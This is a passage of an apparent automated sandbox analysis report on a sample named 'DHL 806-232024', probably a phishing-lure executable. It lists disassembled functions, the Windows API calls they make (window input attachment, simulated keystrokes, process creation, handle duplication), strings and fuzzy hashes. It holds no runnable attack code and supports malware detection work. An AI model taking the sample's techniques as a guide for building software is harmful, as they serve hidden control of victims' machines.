GetForegroundWindow.USER32(00000000,?,?,?,?,?,00930778,?,00000001), ref: 00931714
GetWindowThreadProcessId.USER32(00000000), ref: 0093171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00930778,?,00000001), ref: 0093172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0093173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00930778,?,00000001), ref: 00931755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00930778,?,00000001), ref: 00931767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00930778,?,00000001), ref: 009317AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00930778,?,00000001), ref: 009317C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00930778,?,00000001), ref: 009317CC

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: ebce8f2926d2f067824311399e85726aac33c8652ce7e7091e629443a7d3f328
Instruction ID: ecb3554f25959df3e95443e7b7f5b3545a511ee1da2d63f6dcf8992f8f7a8c7a
Opcode Fuzzy Hash: ebce8f2926d2f067824311399e85726aac33c8652ce7e7091e629443a7d3f328
Instruction Fuzzy Hash: A331D175229308BBDB119F59EC84B7977EDEB05712F144025F802D62B0DB749D409F50

Function 008DFBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008DFC06
OleUninitialize.OLE32(?,00000000), ref: 008DFCA5
UnregisterHotKey.USER32(?), ref: 008DFDFC
DestroyWindow.USER32(?), ref: 00914A00
FreeLibrary.KERNEL32(?), ref: 00914A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00914A92

Strings

close all, xrefs: 008DFC01

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: fb25c7e42c3ff76d52a0c16ab991eb7941b2440abb08172edc0fecd67e53f14e
Instruction ID: 045412f97ded9cc562f4f9e51cad1458d5bf8c1480acc2583d1d4e6037401576
Opcode Fuzzy Hash: fb25c7e42c3ff76d52a0c16ab991eb7941b2440abb08172edc0fecd67e53f14e
Instruction Fuzzy Hash: 47A16A307012268FCB29EF15C494B69F768FF08710F1542AEE90AEB262DB30AD56DF55

Function 0092A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0092AA64), ref: 0092A9A2

Strings

CLASS, xrefs: 0092A721
TEXT, xrefs: 0092A8D9
NAME, xrefs: 0092A7D4
REGEXPCLASS, xrefs: 0092A767
CLASSNN, xrefs: 0092A744
INSTANCE, xrefs: 0092A8B0

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: bd93683d849f9ed978cf999d048015944d4de255d329cca0d1264eb31e06d844
Instruction ID: 478fc39edc082877840723c54fcc61787560e1a157895c08a639b7b1f05c0c38
Opcode Fuzzy Hash: bd93683d849f9ed978cf999d048015944d4de255d329cca0d1264eb31e06d844
Instruction Fuzzy Hash: 7B91C53190061ADBCB18EF74D481BF9FB78FF04304F508129D98AE7245DB306999CBA2

Function 008D2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 008D2EAE

Part of subcall function 008D1DB3: GetClientRect.USER32(?,?), ref: 008D1DDC
Part of subcall function 008D1DB3: GetWindowRect.USER32(?,?), ref: 008D1E1D
Part of subcall function 008D1DB3: ScreenToClient.USER32(?,?), ref: 008D1E45

GetDC.USER32 ref: 0090CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0090CF95
SelectObject.GDI32(00000000,00000000), ref: 0090CFA3
SelectObject.GDI32(00000000,00000000), ref: 0090CFB8
ReleaseDC.USER32(?,00000000), ref: 0090CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0090D04B

Strings

U, xrefs: 0090CF20

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 6d8dc0140cbe3fa13fc4fbb30fb7877f36be43c70e4169a9e6af1ca4cb3029b9
Instruction ID: 961702889541f84b5b191a63f341b3418c1501f192eca46db7057a2f2274e96d
Opcode Fuzzy Hash: 6d8dc0140cbe3fa13fc4fbb30fb7877f36be43c70e4169a9e6af1ca4cb3029b9
Instruction Fuzzy Hash: 9871F771500205EFCF21DF64C884ABA7BBAFF48364F14436AED55962A6C7318C41DF61

Function 0095C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623

Part of subcall function 008D2344: GetCursorPos.USER32(?), ref: 008D2357
Part of subcall function 008D2344: ScreenToClient.USER32(009967B0,?), ref: 008D2374
Part of subcall function 008D2344: GetAsyncKeyState.USER32(00000001), ref: 008D2399
Part of subcall function 008D2344: GetAsyncKeyState.USER32(00000002), ref: 008D23A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0095C2E4
ImageList_EndDrag.COMCTL32 ref: 0095C2EA
ReleaseCapture.USER32 ref: 0095C2F0
SetWindowTextW.USER32(?,00000000), ref: 0095C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0095C3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0095C48F

Strings

@GUI_DROPID, xrefs: 0095C3E1
@GUI_DRAGFILE, xrefs: 0095C424

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 5bf77cbc98ae4fcb4243e979c00f46dd3fd4dbda093c5601b731ba0166d97e9e
Instruction ID: 899a608f590157710c59053d066ed3a72878f22ec76e83f5c6dba2a8c8d4bbaa
Opcode Fuzzy Hash: 5bf77cbc98ae4fcb4243e979c00f46dd3fd4dbda093c5601b731ba0166d97e9e
Instruction Fuzzy Hash: 3051AC70218304AFDB10EF29C855F6A7BE5FB88315F04462EF9918B2F1DB30A949DB52

Function 00948F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0095F910), ref: 0094903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0095F910), ref: 00949071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009491EB
SysFreeString.OLEAUT32(?), ref: 00949215

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 9d79744ca6f3adecdaacf92b328aea0bd64b434ee19213575cde950d4efddd39
Instruction ID: a81db9a925529c752259133bd0cd38fc69d2c2168b71b105461b4a38f6dfc96d
Opcode Fuzzy Hash: 9d79744ca6f3adecdaacf92b328aea0bd64b434ee19213575cde950d4efddd39
Instruction Fuzzy Hash: 93F15E71A00219EFCF04DF94C888EAEB7B9FF89315F108599F516AB290DB31AE45CB50

Function 0094F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0094F9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0094FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0094FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0094FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0094FBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0094FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0094FD90
CloseHandle.KERNEL32(?), ref: 0094FDBF
CloseHandle.KERNEL32(?), ref: 0094FE36

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 30571ce5fbe075d6df13cbe27b1caccdd4ad2cc06e72ab7efe18567eb7eb3889
Instruction ID: 121495971ebcfebcb5442164d39cc43aaff47e0b3b07ef03596793043ac130fb
Opcode Fuzzy Hash: 30571ce5fbe075d6df13cbe27b1caccdd4ad2cc06e72ab7efe18567eb7eb3889
Instruction Fuzzy Hash: 40E19031604242DFCB14EF28C4A1E6ABBE5FF85354F14896DF9998B2A2DB31DC44CB52

Function 00934F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009338D3,?), ref: 009348C7

Part of subcall function 009348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009338D3,?), ref: 009348E0

Part of subcall function 00934CD3: GetFileAttributesW.KERNEL32(?,00933947), ref: 00934CD4

lstrcmpiW.KERNEL32(?,?), ref: 00934FE2
_wcscmp.LIBCMT ref: 00934FFC
MoveFileW.KERNEL32(?,?), ref: 00935017

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: bb30ba51a860ceb9b443df61b2c5f636abda498feed874736df7af09c8bd4348
Instruction ID: b4c50bdcbe11c0c65ee028c5686e57d7deef0a75c3695fdcaeb266a7fc17d04c
Opcode Fuzzy Hash: bb30ba51a860ceb9b443df61b2c5f636abda498feed874736df7af09c8bd4348
Instruction Fuzzy Hash: AB5144B200C7859BC724DBA4C8819DFB3ECEF85351F10492EB289D3151EE75A6888B67

Function 009588B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0095896E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: a876474d616032efb9acca0833c336be15d67839691ed61e03aac9b42109f9ea
Instruction ID: f9272e586302fa8c9ed42c77e71df0da7148a5ad34dd4a689d83a89fdf97b9f1
Opcode Fuzzy Hash: a876474d616032efb9acca0833c336be15d67839691ed61e03aac9b42109f9ea
Instruction Fuzzy Hash: BE51B830504208BFDF20DF2ACC85B6B7B69FB05362F504516FE15F61A1DF71A9889B81

Function 008D2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0090C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0090C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0090C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0090C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0090C5C0
DestroyIcon.USER32(00000000), ref: 0090C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0090C5EC
DestroyIcon.USER32(?), ref: 0090C5FB

Part of subcall function 0095A71E: DeleteObject.GDI32(00000000), ref: 0095A757

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 338b2d15716b26450da098d74cb66cee294469527023786d9d74169ab2d94747
Instruction ID: 97a4d28d8edf9acd4b9394f63f2704b5b0d65601ea685cebd5c64871c3cc249c
Opcode Fuzzy Hash: 338b2d15716b26450da098d74cb66cee294469527023786d9d74169ab2d94747
Instruction Fuzzy Hash: 5F514974614209EFDB20DF25DC45BAA77B9FB58361F10062AF902D72A0DBB0ED90EB50

Function 00929B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0092AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0092AE77
Part of subcall function 0092AE57: GetCurrentThreadId.KERNEL32 ref: 0092AE7E
Part of subcall function 0092AE57: AttachThreadInput.USER32(00000000,?,00929B65,?,00000001), ref: 0092AE85

MapVirtualKeyW.USER32(00000025,00000000), ref: 00929B70
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00929B8D
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00929B90
MapVirtualKeyW.USER32(00000025,00000000), ref: 00929B99
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00929BB7
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00929BBA
MapVirtualKeyW.USER32(00000025,00000000), ref: 00929BC3
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00929BDA
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00929BDD

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 0635da8eb403e9a0775220dd9e7c5e857e046fe30d097a0645dab02f31ad4b2f
Instruction ID: 9a4e637aa9830d14c9d30b79b06e948a8ecc605ff1999cb11e36366a086dead2
Opcode Fuzzy Hash: 0635da8eb403e9a0775220dd9e7c5e857e046fe30d097a0645dab02f31ad4b2f
Instruction Fuzzy Hash: 0511E171564618BFF7106B61EC8AF6A3B2DEB4C766F110425F244AB0A0C9F25C10EBA4

Function 00928E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00928A84,00000B00,?,?), ref: 00928E0C
HeapAlloc.KERNEL32(00000000,?,00928A84,00000B00,?,?), ref: 00928E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00928A84,00000B00,?,?), ref: 00928E28
GetCurrentProcess.KERNEL32(?,00000000,?,00928A84,00000B00,?,?), ref: 00928E30
DuplicateHandle.KERNEL32(00000000,?,00928A84,00000B00,?,?), ref: 00928E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00928A84,00000B00,?,?), ref: 00928E43
GetCurrentProcess.KERNEL32(00928A84,00000000,?,00928A84,00000B00,?,?), ref: 00928E4B
DuplicateHandle.KERNEL32(00000000,?,00928A84,00000B00,?,?), ref: 00928E4E
CreateThread.KERNEL32(00000000,00000000,00928E74,00000000,00000000,00000000), ref: 00928E68

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 97a3fea865031ac2508772dccd5c0d782fde76aff770905da8171514500c6d5e
Instruction ID: f11369d5a785db0fa316710c0e6733b1fb12d16c35a4d8ec1bf91c90a4946d08
Opcode Fuzzy Hash: 97a3fea865031ac2508772dccd5c0d782fde76aff770905da8171514500c6d5e
Instruction Fuzzy Hash: 3E01BFB5654704FFE710AB75EC4DF5B3B6CEB89711F014421FA05DB191CA709800DB20

Function 00949428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0094947C
VariantInit.OLEAUT32(?), ref: 0094954D
VariantInit.OLEAUT32(?), ref: 0094964E
VariantClear.OLEAUT32(?), ref: 00949658
VariantClear.OLEAUT32(?), ref: 009496B5

Strings

Null Object assignment in FOR..IN loop, xrefs: 009494DD, 0094960B, 009496C3
Incorrect Object type in FOR..IN loop, xrefs: 00949631

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: f9303d62a5f17e675ef67a95e15461d8aefe54ff722aa6e0e24c769ec9607d59
Instruction ID: d57593983bc782f5075fc739014cef96f70a5f37fa766414b15c8b32f0fa4363
Opcode Fuzzy Hash: f9303d62a5f17e675ef67a95e15461d8aefe54ff722aa6e0e24c769ec9607d59
Instruction Fuzzy Hash: 0791CE71A00219AFDF24DFA5C848FAFBBB8EF85314F10855AF915AB290D7749901CFA0

Function 00949A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00927652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?,?,0092799D), ref: 0092766F
Part of subcall function 00927652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 0092768A
Part of subcall function 00927652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 00927698
Part of subcall function 00927652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?), ref: 009276A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00949B1B
_memset.LIBCMT ref: 00949B28
_memset.LIBCMT ref: 00949C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00949C97
CoTaskMemFree.OLE32(?), ref: 00949CA2

Strings

NULL Pointer assignment, xrefs: 00949CF0

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 12783f523c8c59abdc81a4be2098a1ef59b5089bd80247fee6b28499e61db5dc
Instruction ID: 6ded148a7491c6cf35c7fa0e22d64ab9ca6963e96ffa69ef9d72a99f3125d426
Opcode Fuzzy Hash: 12783f523c8c59abdc81a4be2098a1ef59b5089bd80247fee6b28499e61db5dc
Instruction Fuzzy Hash: ED912571D00229ABDB10DFA5DC81EDEBBB9FF08310F20415AF519A7281EB319A44CFA1

Function 00932F86 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008EFEC6: _wcscpy.LIBCMT ref: 008EFEE9

_memset.LIBCMT ref: 00933077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009330A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00933159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00933187

Strings

0, xrefs: 00933063
xU, xrefs: 00932FFF
xU, xrefs: 00933006

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0$xU$xU
